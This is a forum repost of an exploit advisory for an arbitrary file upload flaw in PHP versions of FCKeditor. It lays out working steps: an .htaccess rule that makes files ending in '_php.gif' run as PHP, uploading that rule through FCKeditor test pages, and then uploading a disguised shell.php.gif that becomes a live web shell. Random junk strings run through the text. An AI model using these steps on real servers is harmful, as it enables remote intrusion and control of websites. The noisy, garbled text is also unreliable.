中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]
作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
) I- I2 R  i4 j0 L& h作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
8 q* u& I! N6 [; U* ]" t减小字体 增大字体
  b6 l6 c  [8 ^, _( l% E/ b" L[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability+ C1 O' r6 C- |, r# Y% @0 E
[+] Date: 2011$ O! Y  N7 ?' s$ {8 T
[+] Author : sinesafe.cn4 d2 c5 g: R* B0 l
[+] Website : WwW.sinesafe.cn! f2 p+ n% ?: C' }0 Q$ }
———————————————————
2 y6 c" b- y! b' H2 ~1.create a htaccess file:
( D) z, L) a; T1 X- f% Ecode:+ V1 Y3 t  D9 W5 |
<FilesMatch “_php.gif”>1 u4 c7 p. ]2 Y% k! R
SetHandler application/x-httpd-php
, M! q/ ^" [1 X/ ^8 J0 g6 o  ?$ m</FilesMatch>. }  h3 u: h0 e8 ]) j

: d9 p0 N* E! M2 s9 ^2.Now upload this htaccess with FCKeditor.0 z# [0 _3 ^$ W: V5 K; a

  ~- I- c- C; m8 S' jhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
0 m- M& K% C+ w/ u
  u. U4 f% P  e& d- w2 b- \http://www.sinesafe.cn/FCKeditor ... onnectors/test.html- b& I9 L+ @' U4 g

: w3 I% q6 }9 t6 r———————————————————————————————-
; z" O3 }6 K. x, \1 U1 I3.Now upload shell.php.gif with FCKeditor.  J, Q0 ~$ K' X( T: s3 v
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.; N8 z! F( |) d8 j/ Q
5.http://www.sinesafe.cn/anything/shell_php.gif. o$ M- K4 R  s" {
6.Now shell is available from server.
: B8 t* H3 ^2 J& E% f- Z+ N5 `0 W
+ ?+ M) P( C5 b$ Z& O; V% q% n

' Y% c) l: I- x+ ^% p& ], b4 b% O



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2